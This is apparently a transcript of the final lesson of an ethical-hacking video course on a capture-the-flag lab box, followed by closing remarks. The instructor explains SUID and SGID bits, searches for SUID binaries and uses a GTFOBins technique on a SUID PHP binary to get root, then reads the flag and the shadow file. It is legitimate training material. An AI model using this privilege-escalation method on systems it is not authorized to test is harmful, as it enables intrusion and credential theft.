for are any sort of interesting writable files, like here, run PHP, run lock, but there's like, we need to be able to have something that we can abuse the feature of. It has to be more than just writable. So again, this is providing information, but it's not always going to be one specific thing. Now, backup could be interesting. Like there's backup files. It looks like this is specifically to the var www navigate. there could be information in this backup folder. Like there could be perhaps like passwords or something in here. So this could be an area where we might want to look at, just because there might be a password for a user. That user might be the root account password. We have no idea. So we kind of want to look at that. We do want to know what other users are on this computer. So starting at the top is not a bad idea. We could also just cat the etc password file and see what's going on there. In this instance, we see root, we see www-data. There might be more users. We're not sure quite yet. Keep scrolling up. Let's see if there's anything in here. Capabilities could be a possibility for us to look through. We'd have to look at GTFO bins and see. This is something that's a little bit beyond the scope of this course, but it is covered in the Prevest courses. And we're going to keep scrolling up. And this is where this gets a little bit interesting, especially when I start seeing unknown SUID binaries. So let's talk through the SUID and the sticky bits and all that good stuff real quick. So this is actually a great example. So we're looking in here, and we have what is called an SUID set. Now, if you remember or recall from our early Linux lessons, we have file permissions. We have read, write, execute. Let's scroll down a little bit, like right here. Read, write, execute. This is the root setting, okay? This is the owner setting, I should say. Owner of the file, this is the setting. Read blank S, okay? This is actually SGID. This is, okay, let's pretend this says execute, like this right here. Read blank execute. So this is the group setting. Anybody belonging to this group has read and execute permissions. They do not have write permissions. Anybody in this one, okay, this is global. This is read, execute again. So we see here who's the owner of the file. When we're looking at all of these, we see root owns all of these different binaries here. Okay, now let's talk about SUID. You see, instead of read, write, execute, we have read, write, S. Okay, S is our SUID. This means that we can run this, and whenever we run this here, we have the ability to run this as the user that owns it. This is a, and the SUID, we're on the root here, or the owner, sorry, we're on the owner. So we can run this as the person that owns it, which is root. Now you see down here what is called an SGID, which means we can run as the group, and that's sticky right here. Or it's an S right here. I keep calling it sticky. Sticky bit is when it's in this. When you see an S in this area right here for everybody else, that's called the sticky bit. Here is SGID, and in this group setting, it's an SUID. When we look at SUID, it's very interesting because we have root ownership. We can run this binary as root and abuse that feature. Now, there is a quick way to do this, and I can show you how the script is running this, but this is really just looking for permission settings. So we can come through and look. And if you ever go through a checklist, you'll see something like this, where it's just doing a quick find command, and it's looking to see if it can find the permission settings on these. Okay, so permission is going to be 4000, and this is looking specifically for that SUID, and we're just going to put this to dev null here. And now you find all of these in a much cleaner setting. So from our perspective, what we want to do is look at this, because not having the SUID enabled does not necessarily make it vulnerable. But we have a great website that we looked at earlier, GTFO bins, okay, .github.io. And we can do something like this. We can come in here and say, okay, we've got SUID. And then maybe we want to start looking through some of these, like maybe like, I don't know, mount, for example, if we can come through, see if mount's in here. Mount, but I'm looking right here, not there. This new GRP, not there. PHP is there, even though it's 7.3, PHP is there. So maybe we want to open that. Like switch user, SU, I don't see it in here. And you would just go through this list and say, okay, does anything on this list stand out as being a privilege escalation? Now, you are not expected to remember all these. There are some that you will see and it will stand out because you've done it time and time again. But for this situation, this is absolutely what the GTFO bins is built for. So we could scroll down over to SUID and click on it, and it says, if the binary has the SUID bit set, it does not drop the elevated privileges and may be abused to access the file system, escalate, or maintain privilege access as a SUID backdoor. Okay, if it is used to run sh-p, omit the -p argument on systems like Debian that allow the default sh shell to run. So it's giving us some instruction here, okay? So all we need to do on this is we just need to run the PHP, and we need to run it with this rest of this setting here. Okay, that's really it. And we're going to call out that binary specifically. So you copy this, come back in here. We see the binary is sitting in user bin PHP 7.3, and it shouldn't matter that it's PHP 7.3. Just paste the selection. Okay, this is going to execute bin sh as the root user, giving us, hopefully, a root shell, which it gives us the EUID of root, okay? Which means, even though it says we are UID of www data and a group ID of www data, look at this EUID. What we can do with this is cd to root ls cat flag.txt. We are staying as the root user, but we're running in a shell that is executed by root. Okay, so it said, good job on this one. Finding the domain name may have been a little guessy, but the goal of this box is to teach about virtual host routing, which is used a lot on CTS, which is true. So, and proof of concept here is you should be able to cat the etc shadow file. Okay. Prior to this, we would not have been able to do that. Doesn't matter that when we write who am I, oh, we're actually showing as root, but our ID is still staying as www data, okay? But we are executing as root right now. So keep that in mind. We are the root user. We have owned this machine as the root user. And that's it. So SUID is a new lesson for you. Again, if you like this concept of privilege escalation, we are scratching the surface. There's so much to learn. There's always new tips and techniques out there. I encourage you, if you're interested in the CTF path, again, to check out the escalation courses. If not, we're going to start moving into exploit development. We're going to start moving into some of the other stuff that's out there with the Active Directory pen testing and get more into the realistic stuff. So this is good foundational lessons, but I look forward to seeing you in the next video.
Well, that is it, everybody, for this course. If you've made it through what is now nearly 15 hours, I think we just crossed 14 and a half hours. If you made it through all that time, pat yourself on the back. Most people don't make it this far. Hacking is difficult. A lot of people think it sounds cool, it sounds sexy. They start getting into it, and then they just start to fall off. So if you've made it this far, applauds to you. There's a lot of different paths that you can take from here. You can keep going on. I would highly, highly recommend learning web applications, learning Active Directory pen testing, picking up some skills on open source intelligence, adding to your reconnaissance, all of the above. Everything that we talked about in this course so far, building upon that, expanding upon that, especially if you're looking at getting into this field. Anyways, I won't keep any more of your time because I've already kept you for enough time. So that is it. Thank you so much for joining me. If you would please, if you haven't already, consider subscribing to this channel. Just want to get to that million, get that plaque, and then maybe retire. Who knows? But thank you again. Until next time, my name is Heath Adams, aka the Cyber Mentor, and I do thank you for joining me. Peace out.